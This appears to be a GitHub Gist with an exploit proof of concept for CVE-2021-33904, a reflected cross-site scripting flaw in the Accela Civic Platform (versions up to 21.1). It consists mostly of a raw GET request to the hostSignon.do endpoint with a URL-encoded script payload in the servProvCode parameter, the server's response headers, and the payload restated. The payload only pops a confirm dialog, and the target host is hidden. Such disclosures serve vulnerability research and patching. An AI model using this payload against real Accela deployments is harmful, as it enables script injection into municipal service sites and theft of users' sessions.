Last active
June 8, 2021 03:26
-
-
Save 0xx7/3d934939d7122fe23db11bc48eda9d21 to your computer and use it in GitHub Desktop.
Accela Civic Platform Cross-Site-Scripting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Accela Civic Platform Cross-Site-Scripting <= 21.1 | |
# Date: June/7/2021 | |
# Exploit Author: Abdul Azeez Alaseeri | |
# Author page: https://www.linkedin.com/in/0xx777/ | |
# Vendor Homepage: https://www.accela.com/civic-platform/ | |
# CVE-2021-33904 | |
================================================================ | |
Accela Civic Platform Cross-Site-Scripting <= 21.1 | |
================================================================ | |
================================================================ | |
Request Heeaders start | |
================================================================ | |
GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1 | |
Host: Hidden for security reasons | |
Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Upgrade-Insecure-Requests: 1 | |
Te: trailers | |
Connection: close | |
================================================================ | |
Request Heeaders end | |
================================================================ | |
================================================================ | |
Response Heeaders start | |
================================================================ | |
HTTP/1.1 200 OK | |
Expires: Wed, 31 Dec 1969 23:59:59 GMT | |
Cache-Control: no-cache | |
X-Powered-By: JSP/2.3 | |
Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure | |
Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure | |
Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure | |
X-XSS-Protection: 0 | |
Pragma: No-cache | |
Date: Sun, 06 Jun 2021 18:34:38 GMT | |
Connection: close | |
Content-Type: text/html;charset=UTF-8 | |
Content-Length: 13222 | |
================================================================ | |
Response Heeaders end | |
================================================================ | |
You can notice that the parameter "servProvCode" is vulnerable to XSS. | |
Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment